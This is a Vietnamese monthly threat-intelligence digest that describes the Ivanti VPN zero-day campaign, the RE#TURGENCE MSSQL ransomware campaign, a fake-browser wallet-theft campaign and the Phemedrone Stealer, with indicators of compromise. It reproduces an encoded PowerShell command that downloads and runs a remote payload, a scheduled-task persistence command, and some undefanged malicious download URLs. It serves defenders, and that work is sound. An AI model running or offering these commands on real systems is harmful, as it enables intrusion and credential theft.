Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 Chiến dịch tấn công lợi dụng 2 lỗ hổng Zero-day trên sản phẩm Ivanti Connect Secure VPN
Trong tuần thứ hai của tháng 12-2023, đội ngũ Volexity đã phát hiện 1 chiến dịch tấn công lợi dụng 2 lỗ hổng Zero-day trên sản phẩm Ivanti Connect Secure (ICS) VPN (trước đây là Pulse Connect Secure), bao gồm:
- CVE-2023-46805 – lỗ hổng authentication-bypass với điểm CVSS 8.2
- CVE-2024-21887 – lổ hổng command-injection được tìm thấy trong nhiều thành phần web của ICS VPN với điểm CVSS 9.1
Hai lỗ hổng trên khi kết hợp lại sẽ cho phép kẻ tấn công không cần xác thực thực thi các câu lệnh trên hệ thống (unauthenticated RCE). Trong sự cố được Volexity điều tra, kẻ tấn công đã khai thác các lỗ hổng này để đánh cắp dữ liệu cấu hình (configuration data), chỉnh sửa, download file, tiến hành tạo reverse tunnel từ các hệ thống ICS VPN. Đội ngũ xử lý sự cố cũng đã phát hiện hành vi sử dụng 1 file CGI hợp lệ của ICS VPN (compcheckresult.cgi) để làm backdoor thực thi câu lệnh, chỉnh sửa 1 file Javascript sử dụng bởi thành phần Web SSL VPN để tiến hành keylog và thu thập các thông tin đăng nhập của người dùng đăng nhập VPN.
Incident Investigation
Kết hợp cả phân tích dữ liệu bộ nhớ và kết quả kiểm tra của Integrity Checker Tool được cung cấp bởi Ivanti, đội ngũ Volexity đã phát hiện được các file độc hại trên các hệ thống ICS VPN bị xâm nhập:
Tên tệp tin và đường dẫn | Mô tả |
/home/perl/DSLogConfig.pm | File bị sửa đổi với mục đích thực thi file sessionserver.pl |
/home/etc/sql/dsserver/sessionserver.pl | Tạo file sessionserver.sh và thực thi |
/home/etc/sql/dsserver/sessionserver.sh | Chỉnh sửa tệp tin compcheckresult.cgi để thêm một đoạn webshell |
/home/webserver/htdocs/dana-na/auth/compcheckresult.cgi | Cho phép thực thi mã từ xa (do file đã thêm một phần code webshell) |
/home/webserver/htdocs/dana-na/auth/lastauthserverused.js | Thêm một đoạn mã vào file .js nhằm thu thập thông tin xác thực và gửi đến C2 https://symantke.com |
/tmp/rev | Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa |
/tmp/s.py | Tệp tin được phục hồi là PySoxy (https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py), công cụ mã nguồn mở có sẵn trên github. Tệp tin được tạo và thực thi trong đường dẫn /tmp |
/tmp/s.jar | Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa |
/tmp/b | Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa |
/tmp/kill | Các tệp tin chưa xác định được tạo và thực thi trong đường dẫn /tmp, file đã bị xóa |
visits.py | Thay đổi nội dung trong file visits.py (một thành phần sẵn của Ivanti Connect Secure). Thêm các xử lý POST request khi người dùng truy cập đến /api/v1/cav/client/visits |
Một số file khác tại đường dẫn /tmp/ được cho là đã được kẻ tấn công thực thi và xóa bỏ:
- /tmp/rev
- /tmp/s.py
- /tmp/s.jar
- /tmp/b
- /tmp/kill
Malware, Tools, and Living off the Land
Bên cạnh việc tận dụng các công cụ có sẵn trên hệ thống bị xâm nhập, nhóm tấn công cũng đã triển khai 1 loạt các file mã độc và công cụ khác bao gồm các mẫu webshell, proxy, đồng thời thực hiện chỉnh sửa file để thu thập thông tin đăng nhập:
- Sử dụng Task Manager để thực hiện dump bộ nhớ của tiến trình LSASS
- Trích xuất file dit từ bản backup ổ cứng ảo của 1 máy chủ domain controller, sử dụng 7-zip để nén file
- Sử dụng 1 script có trên Github để dump credentials từ Veeam backup software
- Chỉnh sửa 1 file Javascript (js) được load bởi Web SSL VPN để thu thập thông tin đăng nhập khi người dùng truy cập VPN
Mẫu webshell thu thập được Volexity đặt tên GLASSTOKEN gồm 2 phiên bản triển khai trên các máy chủ có kết nối Internet và các máy chủ nội bộ:
- Phiên bản 1 trên các máy chủ có kết nối Internet: gồm 2 chức năng chính dựa theo tham số trong request: chức năng tunnel dựa theo ReGeorg tunnel, chức năng thực thi câu lệnh dựa theo các tham số gửi từ request, đã decode hex và base64 sau đó truyền vào Load().
- Phiên bản 2 trên các máy chủ nội bộ: chỉ có chức năng thực thi câu lệnh, code giống phiên bản 1.
Nhóm tấn công đứng đằng sau chiến dịch được cho là 1 nhóm mới, được Volexity đặt tên UTA0178 và cho rằng đến từ Trung Quốc.
Indicators of Compromise (IoCs)
Domains
gpoaccess[.]com
webb-institute[.]com
symantke[.]com
IP Addresses
206.189.208.156
75.145.243.85
47.207.9.89
98.160.48.170
173.220.106.166
73.128.178.221
50.243.177.161
50.213.208.89
64.24.179.210
75.145.224.109
50.215.39.49
71.127.149.194
173.53.43.7
1.2 Chiến dịch tấn công RE#TURGENCE nhắm đến các máy chủ MSSQL để triển khai MIMIC Ransomware
Đội ngũ Securonix Threat Research đã phát hiện 1 chiến dịch tấn công, được đặt tên RE#TURGENCE, nhắm đến các máy chủ MSSQL thuộc Mĩ, các quốc gia châu Âu và Mĩ Latin. Kết quả tấn công nhắm đến việc rao bán quyền truy cập đến các máy chủ này hoặc triển khai payload ransomware.
Initial Access (TA0001)
Nhóm tấn công thực hiện brute force mật khẩu quản trị để chiếm quyền truy cập đến các máy chủ và sử dụng xp_cmdshell để thực thi các câu lệnh
Execution (TA0002)
Nhóm tấn công thực thi câu lệnh Powershell từ tiến trình sqlservs.exe:
“C:\Windows\system32\cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e
aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABv AGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA4ADgALgAyADEANAAuADIANgAuADMAOgAyADUAOAAyADMALwAxADgAOQBKAHQAJwApACkA |
Câu lệnh tiến hành tải xuống 1 file (189jt) và thực thi nội dung file này thông qua Powershell invoke expression. Quá trình thực thi sẽ tiến hành tải xuống 1 payload Cobalt Strike đã được obfuscated và load vào trong tiến trình đang chạy sử dụng kĩ thuật in-memory reflection. Qua phân tích, Cobalt Strike beacon được xác định inject vào trong tiến trình SndVol.exe.
Nhóm tấn công còn tải xuống công cụ Anydesk (copy bộ cài đặt Anydesk vào C:\ad.exe), sử dụng file ad.bat để cài đặt Anydesk connector service, tạo 1 local user mới và gán user này vào nhóm administrators.
Persistence (TA0003)
Tài khoản local user “windows” được tạo với mật khẩu “denek1010”, và gán vào nhóm quản trị viên.
Credential Access (TA0006)
Mimikatz được tải xuống đường dẫn “c:\users\windows\desktop\x64\” và được sử dụng để thu thập credentials (lưu tại file Mimikatz_dump.txt)
Discovery (TA0102)
Công cụ Advanced Port Scanner được tải xuống qua Anydesk và lưu tại “c:\users\windows\documents\advport.exe”. Nhóm tấn công sử dụng công cụ này để thực hiện:
- Kiểm tra domain controller remote shares
- Thu thập hostname của Hyper-V VM sử dụng reg query “HKLM\Software\Microsoft\Virtual Machine\guest\parameters”
- Kiểm tra kết nối exe đến DC
- Chạy exe trên máy chủ DC sử dụng mật khẩu tài khoản domain admin thu được
- Kiểm tra kết nối RDP đến DC
- Kiểm tra remote shares trên các jumphosts
- Kiểm tra và sử dụng kết nối RDP đến máy chủ decoy
Lateral Movement (TA0008)
Đội ngũ Securonix phát hiện nhóm tấn công di chuyển giữa các máy trong hệ thống mạng nạn nhân sử dụng psexec thuộc bộ công cụ Sysinternals và tài khoản domain admin thu được từ Mimikatz.
Impact (TA0105)
Sau khi thu thập đủ thông tin, nhóm tấn công tiến hành triển khai ransomware lên các máy chủ bị xâm nhập. Dropper red25.exe được tải xuống “c:\Users\windows\Documents\” qua Anydesk, giải nén và thực thi payload ransomware là file red.exe. Mẫu Mimic ransomware sử dụng bộ công cụ Everything by VoidTools để tìm kiếm và xác định các file mục tiêu để mã hóa.
Payload ransomware (red.exe) được thực thi với các câu lệnh:
- “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul2
- “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e ul1
- “c:\users\windows\appdata\local\[RANDOM_GUID]\red.exe” -e watch -pid 4164 -!
File ransome note được lưu tại C:\ —IMPORTANT—NOTICE—.txt.
MITRE ATT&CK
Tactic | Technique |
Initial Access | T1110: Brute Force |
Discovery | T1046: Network Service Discovery |
Defense Evasion | T1112: Modify Registry |
Persistence | T1098: Account Manipulation
T1505.001: Server Software Component: SQL Stored Procedures |
Credential Access | T1003: OS Credential Dumping
T1110.001: Brute Force: Password Guessing |
Command and Control | T1105: Ingress Tool Transfer
T1572: Protocol Tunneling T1573.001: Encrypted Channel: Symmetric Cryptography T1219: Remote Access Software |
Impact | T1486: Data Encrypted for Impact |
Indicators of Compromise (IoCs)
C2
C2 Address | Description | Details |
45.148.121[.]87 | SMB Payloads (Cobalt Strike) | Organization: ORG-SE92-RIPE
Org-name: SKB Enterprise B.V. Country: NL Address: Kingsfordweg 151, 1043 GR Amsterdam, Netherlands |
88.214.26[.]3 | PowerShell payloads (Cobalt Strike) | Organization: ORG-FI54-RIPE
Org-name: FutureNow Incorporated Address: National Cultural Centre 861 P.O. Box 1492, Victoria Mahe, Seychelles |
seruvadessigen.3utilities[.]com | Cobalt Strike beacon URL | Registrar: Vitalwerks Internet Solutions, LLC / No-IP.com |
File hashes
File Name | SHA256 |
ad.bat | 9F3AD476EDA128752A690BD26D7F9A67A8A4855A187619E74422CC08121AD3D3 |
ps1.ps1 | A222BA1FD77A7915A61C8C7A0241222B4AD48DD1C243F3548CAEF23FE985E9C2 1ED02979B3F312C4B2FD1B9CFDFB6BEDE03CD964BB52B3DE017128FE00E10D3C |
start.bat | F328C143C24AFB2420964740789F409D2792413A5769A33741ED956FCE5ADD3E |
Ar3.exe | 1C7B82B084DA8B57FFEEF7BDCA955C2AA4A209A96EC70E8D13E67283C10C12A5 |
gui40.exe | 31FEFF32D23728B39ED813C1E7DC5FE6A87DCD4D10AA995446A8C5EB5DA58615 |
advport.exe | D0C1662CE239E4D288048C0E3324EC52962F6DDDA77DA0CB7AF9C1D9C2F1E2EB |
red25.exe | E9C63A5B466C286EA252F1B0AA7820396D00BE241FB554CF301C6CD7BA39C5E6 |
red.exe | D6CD0080D401BE8A91A55B006795701680073DF8CD7A0B5BC54E314370549DC4 |
1.3 Chiến dịch tấn công tài chính nhắm đến người dùng Trung Quốc và các nước Đông Nam Á
Đội ngũ Antiy Mobile Threat Intelligence đã phát hiện 2 chiến dịch tấn công do cùng 1 nhóm đối tượng thực hiện với mục tiêu về tài chính và đánh cắp dữ liệu nhắm đến người dùng tại Trung Quốc, Việt Nam, Campuchia, Philippines và nhiều nước khác. Các cuộc tấn công được cho là bắt đầu từ tháng 04-2023 và kéo dài đến cuối tháng 09-2023, với số nạn nhân lên tới hơn 10000 người.
Trong chiến dịch tấn công đầu tiên, nhóm tấn công sử dụng 1 bộ công cụ được đóng gói giả mạo trình duyệt Google Chrome với các chức năng hoàn toàn tương tự. Khi người dùng sử dụng trình duyệt này để tải xuống 1 ứng dụng, công cụ này sẽ nhận diện và thay đổi đường dẫn URL để thực hiện tải xuống 1 ứng dụng khác mà người dùng không hề hay biết. Danh sách tải xuống từ địa chỉ IP và domain của nhóm tấn công gồm 13 ứng dụng là các ứng dụng cài đặt ví Web3 và các ứng dụng chat.
Category | Application Name |
Web3 wallet application | imtoken |
itoken | |
mathwallet | |
metamask | |
tokenpocket | |
tronlink | |
trust | |
Chat tool application | |
letstalk | |
line | |
potato | |
skype | |
telegram |
Mỗi ứng dụng đều được cài thêm các chức năng nhằm đánh cắp dữ liệu và các thông tin bảo mật của nạn nhân.
Kiểm tra địa chỉ IP được sử dụng bởi nhóm tấn công (96.9.211.158), đội ngũ phân tích phát hiện 1 lượng lớn dữ liệu về thông tin của các nạn nhân, gồm thông tin cá nhân, thông tin giao dịch, thẻ ngân hàng.
Trong chiến dịch tấn công thứ hai, nhóm tấn công sử dụng 1 ứng dụng hẹn hò lừa người dùng thực hiện các tasks trên ứng dụng và thu phí, đồng thời cũng thực hiện đánh cắp các thông tin cá nhân và tài chính của nạn nhân.
Indicators of Compromise (IoCs)
Hash
0697d382b7f9da6639155fc6f56b19ba
a9883639aa3b407b53fc746ebc3f61c2
305147c064c6cad67ab44c2846f4fe2d
91d56a788b294fac74fcf7e2dc3ec3ce
38d04d093a5b9b83fa0a50979a737c68
f7741c704516d4eee0f50bf0c7fbd5d1
22689b095b531b30f5d24e5d772db29b
02ce97e1dde97835a50d32b78bbbd94e
a3fa220d6d6989a845d8f2254e549350
ae77c710d04b6279d4dbaa94480a81f7
a9549afc58399aeccd3ea64201dca2c6
d294b3b5572f690144443a1af9a69493
e1c618c24a226a6c1647e1f880aa73ba
Url
https://im-download.org/download/imtoken.apk
https://itoken-app.org/download/itoken.apk
https://mathwallet.la/download/mathwallet.apk
https://mm-down .net/download/metamask.apk
https://tokenpocket-down.org/download/tokenpocket.apk
https://tronlink-apps.net/download/tronlink.apk
https://trustwallet-download.net/download/ trust.apk
https://letstallk-apps.com/download/letstalk.apk
https://line-downloads.net/download/line.apk
https://potato-apk.net/download/potato.apk
https: //skyppe-download.com/download/skype.apk
https://te1egram-download.com/download/telegram.apk
https://ws-download.com/download/whatsapp.apk
C2
https://feijpic.com/api/ch/me
https://feijwrod.com/api/index/reqaddV2
https://16qbci.com/api/ClientMToken/RegainAppMtoken
https://qscgyj.com/api/index/
http://96.9.211.158:8082/Api/
2 Malware
2.1 Phân tích Phemedrone Stealer
Mẫu mã độc được triển khai thông qua việc khai thác lỗ hổng CVE-2023-36025 có tên Phemedrone, nhắm mục tiêu vào các trình duyệt web và dữ liệu từ ví tiền điện tử cũng như các ứng dụng nhắn tin như Telegram, Steam và Discord của người dùng. Phemedrone có các tính năng chụp ảnh màn hình và thu thập thông tin liên quan đến hệ thống bao gồm thông tin hardware (phần cứng), vị trí, hệ điều hành. Các dữ liệu của người dùng sau đó sẽ được gửi đến máy chủ C2 hoặc Telegram. Payload cuối mà mã độc sử dụng được viết bằng C# và được maintained thường xuyên trên GitHub.
CVE-2023-36025 là lỗ hổng ảnh hưởng đến Microsoft Windows Defender SmartScreen do không kiểm tra các tệp tin Internet Shorcut(.url), kẻ tấn công có thể lợi dụng lỗ hổng này bằng cách tạo các tệp .url, thực thi các script độc hại nhằm vượt qua (bypass) các cảnh báo và kiểm tra của Windows Defender SmartScreen.
Để triển khai Phemedrone Stealer, kẻ tấn công lưu trữ các file Internet Shortcut độc hại trên Discord hoặc các dịch vụ cloud như FileTransfer.io. Các tệp tin độc hai này thường được ngụy trang bằng cách sử dụng các công cụ rút ngắn URL như shorturl.at. Thông qua việc lừa người dùng mở tệp .url, lỗ hổng CVE-2023-36025 được kích hoạt, đồng thời tạo kết nối tới máy chủ C2 để tải xuống máy nạn nhân các tệp tin độc hại khác
Têp tin đươc tải xuống và thực thi có định dạng .cpl (control panel item), thực chất đây là một file DLL được thực thi thông qua tiến trình control.exe, một tiến trình hợp pháp của Windows Control Panel
Sau khi tệp tin .cpl được thực thi, nó sẽ gọi tới rundll32.exe để thực thi tệp DLL. DLL này là một loader có nhiệm vụ gọi tới Windows Powershell để tải xuống thêm file độc hại có tên DATA3.txt được lưu trữ trên nền tảng Github.
DATA3.txt là một loader được obfuscate nhằm che giấu nội dung và khiến khó khăn hơn trong quá trình phân tích. DATA3 có nhiệm vụ sử dụng Powershell để tải xuống một zip file ở cùng repo github, để file ở trạng thái ẩn sử dụng công cụ hợp pháp của Windows – attrib.exe
Bên trong file zip có 3 files:
- exe: Tệp tin hợp pháp của Windows – Windows Fault Reporting.
- dll: Tệp tin độc hại, sử dụng WerFaultSecure.exe để khởi chạy
- pdf: Payload encryt sử dụng thuật toán RC4, được sử dụng cho các giai đoạn sau nhằm triển khai các mã độc khác.
Wer.dll, có nhiệm vụ giải mã và thực thi mã độc ở giai đoạn tiếp theo, persistence trên máy nạn nhân bằng cách tạo lập lịch. Wer.dll sử dụng nhiều kỹ thuật nhằm tránh sự phát hiện của các AV và làm khó khăn hơn trong quá trình phân tích, dịch ngược như API hashing hoặc mã hóa các chuỗi. Ngoài ra, DLL này được bảo vệ bởi VMProctect.
DLL này được thực thi thông qua kỹ thuật DLL sideloading, bằng cách tạo tệp DLL giả mạo nằm cùng trong thư mục của ứng dụng. WerFaultSecure.exe sẽ thực hiện load wer.dll và gọi tới hàm WerpSetExitListeners. Như đã đề cập ở trên, loader sử dụng API Hashing, các hash tương tứng với các hàm APT và thư viện như ở bảng sau:
998B531E | KERNEL32.DLL |
46DED02D | GetModuleHandleExW |
0FC6B42F1 | GetModuleFileNameW |
0C97C1FFF | GetProcAddress |
3FC1BD8D | LoadLibraryA |
0F29DDD0C | lstrcatW |
759903FC | CreateDirectoryW |
0A1EFE929 | CreateFileW |
0A7FB4165 | GetFileSize |
8B35A289 | LocalAlloc |
95C03D0 | ReadFile |
0B09315F4 | CloseHandle |
0B1866570 | GetModuleHandleA |
0F54D69C8 | CopyFileW |
Đối với các chuỗi, loader sử dụng thuật toán XOR, với mỗi một byte, thuật toán sẽ sinh ra một khóa duy nhất trong buffer, tuân theo công thức (characterIndex % <num1> + <num2>). Mỗi chuỗi được mã hóa có chức năng giải mã riêng với các giá trị <num1> và <num2> là duy nhất, khiến cho việc giải mã trở nên khó khăn hơn. Giải mã thu được các chuỗi như sau:
“/F /CREATE /TN “Licensing2” /tr “C:\Users\Public\Libraries\Books\WerFaultSecure.exe” /sc minute /MO 90″
\\secure.pdf
\\wer.dll
\\WerFaultSecure.exe
Activeds.dll
advapi32
AllocADsMem
C:\\Users\\Public\\Libraries\\Books\\secure.pdf
C:\\Users\\Public\\Libraries\\Books\\wer.dll
C:\\Users\\Public\\Libraries\\Books\\WerFaultSecure.exe
C:\Windows\explorer.exe
C:\Windows\System32\schtasks.exe
CreateProcessW
CryptCATCDFOpen
kernel32.dll
PathRemoveFileSpecW
ReallocADsMem
Shlwapi.dll
SystemFunction032
Wintrust.dll
Loader thưc hiện persistence bằng cách tạo đường dẫn “C:\Users\Public\Libraries\Books”, sao chép các file wer.dll, secure.pdf, and WerFaultSecure.exe từ thư mục hiện tại mà loader đang thực thi sang thư mục “C:\Users\Public\Libraries\Books”. Thực hiện câu lệnh “schtasks.exe “/F /CREATE /TN \”Licensing2\” /tr \”C:\\Users\\Public\\Libraries\\Books\\WerFaultSecure.exe\” /sc minute /MO 90″”.
Sau quá trình tạo persistence, mã độc thực hiện giải mã nội dung trong file safe.pdf theo thuật toán RC4, dùng các hàm AllocADsMem và ReallocADsMem từ thư viện Activeds.dll nhằm cấp phát bộ nhớ và ghi nội dung đã giải mã, gọi hàm VirtualProtect để sửa đổi phân vùng thành quyền Executable-Read-Write.
Mã độc sử dụng các hàm API callback để chuyển luồng thực thi, bằng cách gọi tới hàm CryptCATCDFOpen (hàm được sử dụng để xử lý cryptographic catalog files trong Windows), hàm này nhận 2 tham số: pwszFilePath và callback function – PFN_CDF_PARSE_ERROR_CALLBACK, ở đây callback function sẽ nhận EP của shellcode. Khi hàm CryptCATCDFOpen được gọi, callback function cũng sẽ được gọi, từ đó mã độc được thực thi
Sau quá trình thực thi shellcode, shellcode này được public trên Internet có tên Donut, một shellcode mã nguồn mở cho phép thực thi VBScript, JScript, EXE files, DLL files, and .NET assemblies trong bộ nhớ. Donut có thể nén các file sử dụng aPLib, LZNT1, Xpress, và Xpress Huffman sử dụng hàm RtlCompressBuffer, mã hóa payload sử dụng mã hóa Chaskey. Đối với mẫu mã độc này, Donut được nhúng trực tiếp vào loader, không sử dụng các cách nén file mà chỉ mã hóa thông thường. Với payload cuối cùng, Donut được cấu hình để load Common Language Runtime (CLR), khi CLR được load thành công vào trong tiến trình, Application Domain được tạo cho phép chạy assemblies, Donut load .NET assembly và gọi tới entry point của payload
Phân tích Phemedrone payload
Đánh cắp thông tin xác thực
Khi được thực thi, mã độc khởi tạo các cấu hình và giải mã một số thông tin như Telegram API token, chat ID, and Email_To mutex (được sử dụng để đồng bộ hóa) sử dụng thuật toán mã hóa đối xứng RijndaelManaged với key mã hóa cùng giá trị salt được định nghĩa trong code. Quá trình giải mã bao gồm loại bỏ “CRYPTED:” khỏi chuỗi, decoded base 64 và chuyên vào mảng byte, giải mã với thuật toán đã mô tả bên trên để thu được bản rõ (cleartext)
Mã độc sử dụng “MutexCheck.Check()” method để kiểm tra và đảm bảo chỉ có một mã độc được thực thi trên máy nạn nhân. Nếu có phiên bản khác đang hoạt động, chương trình sẽ tự động ngắt ngay lập tức, sau khi giải mã, mutex có giá trị như sau: 5dad16bd-6884-4ab8-b182-a504b4c99bcf
Phần mềm độc hại nhắm tới các ứng dụng và dịch vụ trên máy nạn nhân, tùy từng trường hợp, các thông tin nhạy cảm sau sẽ được trích xuất:
Các trình duyệt có base là nhân Chromium: Mã độc thu thập dữ liệu, bao gồm mật khẩu, cookie và thông tin lưu trữ trong các ứng dụng như LastPass, KeePass, NordPass, Google Authenticator, Duo Mobile và Microsoft Authenticator, cùng nhiều ứng dụng khác.
Ví điện tử: trích xuất các file từ các ứng dụng ví tiền điện tử khác nhau như Armory, Atomic, Bytecoin, Coninomi, Jaxx, Electrum, Exodus và Guarda
Discord: Mã độc trích xuất authentication tokens từ úng dụng Discord, giúp kẻ tấn công truy cập trái phép vào tài khoản của người dùng
FileGrabber: Mã độc sử dụng dịch vụ này để thu thập các files từ người dùng từ các thư mục được chỉ định như Document và Desktop
FileZilla: Thu thập thông tin kết nối và thông tin xác thực.
Gecko: Mã độc nhắm mục tiêu vào các trình duyệt có base là Gecko để thu thập dữ liệu người dùng.
System Information: Thu thập thông tin chi tiết về hệ thống, bao gồm thông số phần cứng, vị trí địa lý và thông tin hệ điều hành cũng như chụp ảnh màn hình
Steam: Truy cập các tập tin liên quan đến nền tảng Steam
Telegram: Thu thập dữ liệu người dùng từ thư mục cài đặt, nhắm tới các tệp liên quan đến xác thực trong thư mục “tdata”, Các tệp tin này được tìm kiếm dựa trên kích thước và kiểu đặt tên
Sau quá trình này, mã độc sử dụng MemoryStream và ZipStorage để xử lý và nén các thông tin này. MemoryStream được sử dụng để lưu trữ dữ liệu tạm thời trong buffer, cho phép xử lý thông tin nhanh chóng và hiệu quả mà không cần thao tác I/O trên đĩa. Sau đó, ZipStorage được sử dụng để nén dữ liệu thành định dạng tệp ZIP trực tiếp trong MemoryStream.
Trước khi đánh cắp dữ liệu, mã độc sẽ sẽ kiểm tra lại Telegram API token thông qua method TokenIsValid. Nếu phản hồi nhận lại được bắt đầu bằng {“ok”:true thì API token được coi như hợp lệ. Nếu API Token không hợp lệ, exception sẽ sinh ra và lưu lại sau đó return false gọi tới Environment.Exit(0) để ngắt process.
Sau quá trình kiểm tra Telegram API Token, mã độc sẽ gửi đa dạng các thông tin cho kẻ tấn công thông qua method SendMessage trong class global::Telegram.Telegram
Ví dụ về report tóm tắt do Phemedrone Stealer tạo ra, thể hiện chi tiết các dữ liệu đã đánh cắp. Báo cáo bao gồm thông tin chính về hệ thống của nạn nhân và dữ liệu người dùng như vị trí địa lý, thông số phần cứng (hardware), thống kê dữ liệu web và các tính năng bảo mật của hệ thống.
Quá trình tiếp theo là đánh cắp các file đã được xử lý ở định dạng ZIP – lưu trữ đầy đủ các dữ liệu thông qua SendZip method, sử dụng HTTP POST request để giao tiếp với Telegram API, được gửi dưới dạng document. SendZip and MakeFormRequest2 method có nhiệm vụ xây dựng các request, nhằm đảm bảo các header và file data trong stream là chính xác. Request sẽ được gửi tới sendDocument API endpoint sử dụng bot token và chat ID, bao gồm cả việc xử lý và gửi lại khi phát sinh lỗi, đảm bảo tệp tin được tải lên thành công.
Indicators of Compromise (IoCs)
SHA256
f32964087462ba3c96a87ee8387f89de8fa605f2f5bb84cb5f754cd736683f2d
5f1a027f1c1468f93671a4c7fc7b5da00a3c559a9116f5417baa6c1f89550d9f
c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66
a841cd16062702462fdffdd7eef9fc3d88cde65d19c8d5a384e33066d65f9424
815b2125d6f0a5d99750614731aaad2c6936a1dc107a969408a88973f35064c0
ccd19ef6e81e936fc944ebafaefd2ad99ccd11dd15fbc7d3460726bb38237595
ea9b0dee3b7583ce60bba277e2189acb660284abf6b3b9273b6a60c85b0a5ce3
9a96406ae06b703d827fffd1f1ced0781f89ca2af6d5041721e9fbd2647c8430
22236e50b5f700f5606788dcd5ab1fb69ee092e8dffdd783ac3cab47f1f445ab
1433efd142007ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5
ad513d2cba6cc82a50ee6531b275e937480d8fee20af2b4f41da5f88e408a4e9
7c0a1e11610805bd187ef6e395c8fa31c1ae756962e26cdbff704ce54b9e678a
4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab
c9743e7ffb6f6978f08f86e970ddb82e24920d266b32bd242254fbf51abfe6ce
c3bfaa1f52abdbb673d83af67090112dfdfe9ea8ff7a613f62bd48bace205f75
6bd8449de1e1bdd62a86284ed17266949654f758e00e10d8cd59ec4d233c32e5
4446d5b475ce8aed5244da917ae42b6cb9744ffc4efd766af8e4dee7dd5a3e19
70c23213096457df852b66443d9a632e66816e023fdf05a93b9087ffb753d916
69941417f26c207f7cbbbe36ce8b4d976640a3d7f407d316932428e427f1980b
e2d19a23b19a07d35d16990e78c5cfaa3dd97b9ce92201f4db18a7da95fe6ff8
b7f53c507a1aa4254b66a883285e27b42d65ea4ea4206fe674e0d03738f52141
4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab
c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66
f24a8b3144e89b9bececfbf76add87ddefbd19a024a85692026e97f3a9911902
e64b185c149cb523d13cb46ea3911e2c0595b6f10ae86e6a14b15e8d45c0cdcb
cb58bf466675be9e11cfb404503cb122514f47b9708d033e381f28a60535812c
80f88566fda41ebc1b4e35d89748a804740bba0d03049c33c536cffd5e0491e2
4a36cc607ca5c2acc536510fd1b0ddd43a9403dac168d2420d474611909ed9e6
89caa1568fcff162086dae91e6bd34fd04facba50166ebff800d45a999d0be8b
188c72f995ebd5e1e8d0e3b9d34eeeec2ec95d4d0fee30d2ea0f317ab1596eef
e326c1b9e61cca6823300158e55381c6951b09d2327a89a8d841539cad3b4df3
4da33c7fe62f71962913d7b40ff76aff9f1586e57db707b3d6b88162c051f402
ff44e502bd5ea36e17b3fc39b480e65971b36002f27fb441e4acadd6bf604a20
b7980f64f892d70b1cd72a8c80f8319f50c3c410aba4e4bc63fd6494bcb4f313
480fae3bdc2604cba846779dd7dced95b3ce036bdef629ded247771a2e4d5d58
348aea633c99e5f6a0ac7b850961be0a145a35678e5bd074b4852f7a2419f518
1c53dffcb4c474a2b08708609466e7d234d6d51139b6532af54fac5bb8d37415
b37ec923451dd15a0f68df0b392b0f1b243fe50c709de9e574ac14cf6fabdd53
f2814a4b3796fb44045c33b9d0d9972bf40478e5bc74b587486900c6cfa02f3d
5f1a027f1c1468f93671a4c7fc7b5da00a3c559a9116f5417baa6c1f89550d9f
8b73d7aa8bb8db8a9ecbf9f713934fbbb5caf4745d7a61a6f34a100c4d84fd9d
9b9ba722b314febfc44919551a03dde1539f115333183c2cb5e74b8e644ba5b3
568b4b868b225f06bb34da0dc23603c9dedccc2b319353407c814983d5322563
5ecad303475e180f8879871d8571d1a7eeb99e0b3c63cc77fdd02cb9b8c51211
d5b1214f1817a16b2bc8a76daa48c9a3c5af0e411cf4f0c17b0e364d437a454b
5f0ff1fd6ca89a0ddd3178e023dea8f79ff3c3f3d8ff7900378eb014e83ed326
40c6fa38e44e00d8cf113d0a079cd46f8b7654331f12e50d2af5a9f1ddc6d266
3a34cd3a3221d83a1cca8913b2afbb5b780027d48b44d3ce15dfe4a402064871
URLs
hxxps[://]raw[.]githubusercontent[.]com/nateeintanan2527/Joyce_Data/main/DATA3[.]txt
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1175808264479449138/DocuSign3[.]url?ex=656c93c7&is=655a1ec7&hm=6e8b316f2112cfaf27bc8cf35089098e4a0f2d16054e8d199c13588c31b2e383&
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1177255995156742144/DocuSign4[.]url?ex=6571d815&is=655f6315&hm=f9e208714ffc862f97cb6363fb887f11fda0020802a020a56a571c4195114854&
hxxps[://]shorturl[.]at/ixEZ7
file[://]51[.]79[.]185[.]145/pdf/data4[.]zip/pdf4[.]cpl
hxxp[://]51[.]79[.]185[.]145/pdf/kay[.]zip/kay[.]cpl
hxxp[://]51[.]79[.]185[.]145/pdf/data2[.]zip/pdf2[.]cpl
hxxp[://]51[.]79[.]185[.]145/pdf/
hxxps[://]shorturl[.]at/flEK5
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1167767477921513512/SecureDocuSign_pdf[.]url?ex=654f5336&is=653cde36&hm=08ea24126262ff865a1ab0c79f20e41e9e53896d9cda8e0c374c077f5a500b00&
hxxps[://]shorturl[.]at/vzAD2
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627585105997854/DocuSign2[.]url?ex=6559bae5&is=654745e5&hm=ab8a5d275414768c20bd9a8a0e434c4b8fe7c0bd8006c3b5f69cc80b7fe57cb1&
hxxps[://]shorturl[.]at/bsuCR
hxxps[://]cdn[.]discordapp[.]com/attachments/1083311514368360519/1170627584627855481/DocuSign1[.]url
